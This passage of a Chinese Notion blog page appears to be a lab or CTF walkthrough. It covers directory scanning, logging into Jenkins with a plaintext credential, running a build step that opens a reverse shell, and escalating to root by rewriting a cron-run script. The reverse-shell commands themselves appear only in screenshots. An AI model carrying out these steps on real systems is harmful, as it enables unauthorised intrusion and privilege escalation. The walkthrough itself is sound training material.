id="765903be52ba423fa5bee2a8ca375589" class="notion-header-anchor"></div><a class="notion-hash-link" href="#765903be52ba423fa5bee2a8ca375589" title="脚本扫描"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">脚本扫描</span></span></h4><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-b25160b28a14421091c4bbb498a0e5e4" data-id="b25160b28a14421091c4bbb498a0e5e4"><span><div id="b25160b28a14421091c4bbb498a0e5e4" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b25160b28a14421091c4bbb498a0e5e4" title="web服务"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web服务</span></span></h3><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-0e0dcf57fd5b4f919c2e5d22d25726dc" data-id="0e0dcf57fd5b4f919c2e5d22d25726dc"><span><div id="0e0dcf57fd5b4f919c2e5d22d25726dc" class="notion-header-anchor"></div><a class="notion-hash-link" href="#0e0dcf57fd5b4f919c2e5d22d25726dc" title="80端口"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">80端口</span></span></h4><div class="notion-text notion-block-60cea9c817ab40dbbd21d9afa961b976">访问</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-bb27dbb1a35e42588de3c3eb335625a7"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F54b4e223-96a0-442e-b5ce-d7203286c5ee%2FUntitled.png?table=block&amp;id=bb27dbb1-a35e-4258-8de3-c3eb335625a7&amp;t=bb27dbb1-a35e-4258-8de3-c3eb335625a7&amp;width=1960&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-ef230bc012124e618adb781feba93bdb"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-c0cf1253e6944868aa6e9572b20cb818" data-id="c0cf1253e6944868aa6e9572b20cb818"><span><div id="c0cf1253e6944868aa6e9572b20cb818" class="notion-header-anchor"></div><a class="notion-hash-link" href="#c0cf1253e6944868aa6e9572b20cb818" title="目录爆破"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">目录爆破</span></span></h4><div class="notion-text notion-block-b43a71b00a7a48a98b189cc07ec9122a">feroxbuster扫</div><div class="notion-blank notion-block-c116df79624f46e28cd786929ff163a2"> </div><div class="notion-text notion-block-a73cda526a2c484b8daeaecd5357825f">gobutster扫描</div><div class="notion-text notion-block-6e8bec0e0ced437bb3523e0c2dddb028">扫描出</div><div class="notion-text notion-block-e6fc9c6443bf47a79769b62f4d9e6e2e">/.html                (Status: 403) [Size: 207]
/index.html           (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]</div><details class="notion-toggle notion-block-b2f2a55e0b9442dc95968e8e10efc36b"><summary>ip/access.html</summary><div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-9b58ff2cd1f34961b4af4bf6be61df61"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7f2eda16-fa67-4bb6-b467-202c5a606a05%2FUntitled.png?table=block&amp;id=9b58ff2c-d1f3-4961-b4af-4bf6be61df61&amp;t=9b58ff2c-d1f3-4961-b4af-4bf6be61df61&amp;width=1565&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure></div></details><div class="notion-blank notion-block-7af1b648fb614c1b9fde1c6fd42de82d"> </div><div class="notion-blank notion-block-99ea712fa9e9460d811ecd5ba31c8f21"> </div><div class="notion-blank notion-block-72791904a4bb4a28a7f61092930fd627"> </div><div class="notion-blank notion-block-64440c99f2c84d0d9719949c8f3d7c55"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-84a21ddb03184772b7a8c8a28fb38df4" data-id="84a21ddb03184772b7a8c8a28fb38df4"><span><div id="84a21ddb03184772b7a8c8a28fb38df4" class="notion-header-anchor"></div><a class="notion-hash-link" href="#84a21ddb03184772b7a8c8a28fb38df4" title="8080端口"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">8080端口</span></span></h3><div class="notion-text notion-block-ef9cd08c92c748b9b8546e2736ba2a36">ip:8080发现Jenkins服务</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-081d5fc2b3c346d3abede0cc622c85f3"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7465a8d0-a5ec-41e7-83c1-65252dbdc81d%2FUntitled.png?table=block&amp;id=081d5fc2-b3c3-46d3-abed-e0cc622c85f3&amp;t=081d5fc2-b3c3-46d3-abed-e0cc622c85f3&amp;width=728&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f29d77dada434f1f9cc7e7c96d494463">使用eder:vipsu登录</div><div class="notion-blank notion-block-35aa0b42ca434787836e693069a56faa"> </div><div class="notion-blank notion-block-b6405ec176164e4483be6c87dcf3ca42"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-8704fbde34b545e28052be84babc90bc" data-id="8704fbde34b545e28052be84babc90bc"><span><div id="8704fbde34b545e28052be84babc90bc" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8704fbde34b545e28052be84babc90bc" title="Jenkins拿shell"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>Jenkins拿shell</b></span></span></h3><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-05460f1ae06e4c798e4910bf2b3338d3" data-id="05460f1ae06e4c798e4910bf2b3338d3"><span><div id="05460f1ae06e4c798e4910bf2b3338d3" class="notion-header-anchor"></div><a class="notion-hash-link" href="#05460f1ae06e4c798e4910bf2b3338d3" title="1、新建项目"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>1、新建项目</b></span></span></h4><div class="notion-text notion-block-0f1fd9cf61c94a04a4f383cb97dc8c13">选择freestyle project</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-2b153367e1cd45f2a4e989b897b97f7e"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425683_64758e139067202e06c96.png!small?t=2b153367-e1cd-45f2-a4e9-89b897b97f7e" alt="notion image" loading="lazy" decoding="async"/></div></figure><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-478979727ab54661a4d9f37f7b9c66bb"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425720_64758e38a987277a6b657.png!small?1685425722894&amp;t=47897972-7ab5-4661-a4d9-f37f7b9c66bb" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-0d8c59e6de084a33807c1ed422a3c088" data-id="0d8c59e6de084a33807c1ed422a3c088"><span><div id="0d8c59e6de084a33807c1ed422a3c088" class="notion-header-anchor"></div><a class="notion-hash-link" href="#0d8c59e6de084a33807c1ed422a3c088" title="2、尝试反弹shell"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>2、尝试反弹shell</b></span></span></h4><div class="notion-text notion-block-172f3606528d4bc1825f31c7f6484c84">下拉菜单第一项，执行windows批处理命令；第二项执行shell</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-0b390e489bb04bcea84eb2ddae9aaa54"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425739_64758e4b6ab5ffab85d5b.png!small?1685425740581&amp;t=0b390e48-9bb0-4bce-a84e-b2ddae9aaa54" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f75f7c215b3e473e9db55775c052ce98">选择第二项执行shell，并写入shell命令</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-83730efa62554ed18f0ec1633b10cff7"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425767_64758e677bce46686ba68.png!small?1685425767834&amp;t=83730efa-6255-4ed1-8f0e-c1633b10cff7" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-eafb94db30da4a1c9a34098632d4a0b5" data-id="eafb94db30da4a1c9a34098632d4a0b5"><span><div id="eafb94db30da4a1c9a34098632d4a0b5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#eafb94db30da4a1c9a34098632d4a0b5" title="3、监听端口"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>3、监听端口</b></span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-38d26cd5abd44039a919724197752641"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425798_64758e866b48a9f30c952.png!small?1685425798556&amp;t=38d26cd5-abd4-4039-a919-724197752641" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-8c75f56bcadd42879e8dcc593d914633" data-id="8c75f56bcadd42879e8dcc593d914633"><span><div id="8c75f56bcadd42879e8dcc593d914633" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8c75f56bcadd42879e8dcc593d914633" title="4、执行项目"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>4、执行项目</b></span></span></h4><div class="notion-text notion-block-75adf7e6ecb54b0284957033d70f1f18">点击build now执行项目</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-6cbe4798bc9042b08bc2127a81d2bfb8"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425815_64758e971beba89a087d9.png!small?1685425815634&amp;t=6cbe4798-bc90-42b0-8bc2-127a81d2bfb8" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-e5c5aecef9fd4b7db35c9407c52ebf06" data-id="e5c5aecef9fd4b7db35c9407c52ebf06"><span><div id="e5c5aecef9fd4b7db35c9407c52ebf06" class="notion-header-anchor"></div><a class="notion-hash-link" href="#e5c5aecef9fd4b7db35c9407c52ebf06" title="5、获得shell"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>5、获得shell</b></span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-1979c803fe224d2db5c43b235ce3f4bc"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://image.3001.net/images/20230530/1685425832_64758ea84ccb1ba3a981f.png!small?1685425832689&amp;t=1979c803-fe22-4d2d-b5c4-3b235ce3f4bc" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-2ba0ed20685146fd8c3abd1bbbb02dbc"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-7271f690780e4c809419ab46e50cc13a" data-id="7271f690780e4c809419ab46e50cc13a"><span><div id="7271f690780e4c809419ab46e50cc13a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#7271f690780e4c809419ab46e50cc13a" title="提权"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">提权</span></span></h3><div class="notion-text notion-block-ae5dd9734d80436a879b47c8131e484f">当前没有任何权限</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-e103371cc5584b479952ea5a03419506"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:574px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa03027ca-d953-43b0-9fee-428c30d7cd8b%2FUntitled.png?table=block&amp;id=e103371c-c558-4b47-9952-ea5a03419506&amp;t=e103371c-c558-4b47-9952-ea5a03419506&amp;width=574&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-736403ac641143f89b031cfeef6ae5f5"> </div><div class="notion-text notion-block-99b0b38fc904411e82b9a00010229401">/etc/passwd</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-f1f877ba9aef4999a48084781b8f97ce"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:614px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc7a81003-f7d2-4771-9a19-fca3d101b63a%2FUntitled.png?table=block&amp;id=f1f877ba-9aef-4999-a480-84781b8f97ce&amp;t=f1f877ba-9aef-4999-a480-84781b8f97ce&amp;width=614&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-889c7a6d32dd403d8172e3ef16e4deb9"> </div><div class="notion-text notion-block-3c87f78cc3004bb8ba43e061483bbead">/etc/shadow没有权限</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4a3dc89dda1a4131b6657b7672d0eff9"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:310px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fd4bb9811-44f9-4374-89a2-45713712c976%2FUntitled.png?table=block&amp;id=4a3dc89d-da1a-4131-b665-7b7672d0eff9&amp;t=4a3dc89d-da1a-4131-b665-7b7672d0eff9&amp;width=310&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-26bacf9ff83241eaa7db37ad507d46b3"> </div><div class="notion-text notion-block-07fa55f013e04ed4b40937062e838a6e">查看计划任务</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-95c23de976704a4eb3df29dbac1ee8bb"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F42ffbf84-c1be-4f5a-b3a8-ad92430a3beb%2FUntitled.png?table=block&amp;id=95c23de9-7670-4a4e-b3df-29dbac1ee8bb&amp;t=95c23de9-7670-4a4e-b3df-29dbac1ee8bb&amp;width=764&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-af1ded2fff8a45c9a1fcebf3fb1d21fe">每五分钟使用root权限执行/etc/script/CleaningScript.sh的脚本</div><div class="notion-blank notion-block-0789e8aa47a5413d84df1d4ae56132a6"> </div><div class="notion-text notion-block-71e844cea1b84b6c9a580d36d2441112">修改/etc/script/CleaningScript.sh的脚本</div><div class="notion-text notion-block-9812b38d6e734fbaa34b8836248e6bd6">反弹shell写入计划任务</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-d7c470d584a74280982dce04c57ccd79"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F02cf793a-5a22-4cd6-b414-cd727a899a4e%2FUntitled.png?table=block&amp;id=d7c470d5-84a7-4280-982d-ce04c57ccd79&amp;t=d7c470d5-84a7-4280-982d-ce04c57ccd79&amp;width=845&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-fc680d5c33ea491793ebb25da7398aeb">成功提权</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-d4818f2daf44468eb9bab9977f767729" data-id="d4818f2daf44468eb9bab9977f767729"><span><div id="d4818f2daf44468eb9bab9977f767729" class="notion-header-anchor"></div><a class="notion-hash-link" href="#d4818f2daf44468eb9bab9977f767729" title="🤗 总结归纳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">🤗 总结归纳</span></span></h2><div class="notion-text notion-block-76c2d45c22f4439ea38d6ce1a9c6f615">收获满满。。。</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-b34d0028d91749929018f2ebf89033cf" data-id="b34d0028d91749929018f2ebf89033cf"><span><div id="b34d0028d91749929018f2ebf89033cf" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b34d0028d91749929018f2ebf89033cf" title="📎 参考文章"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📎 参考文章</span></span></h2><ul class="notion-list notion-list-disc notion-block-deb28bc059c8465ab9c4ddde5edccbdb"><li>一些引用</li></ul><ul class="notion-list notion-list-disc notion-block-db27ae8245924b6ead73f090fc9d2f8d"><li>引用文章</li></ul><div class="notion-blank notion-block-f295e540dce442009cf893a2510290a5"> </div><div class="notion-callout notion-gray_background_co notion-block-7dcd2addc88546b29dffe95260913ec0"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="💡">💡</span></div><div class="notion-callout-text">有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~</div></div></main></div>]]></content:encoded>
        </item>
    </channel>
</rss>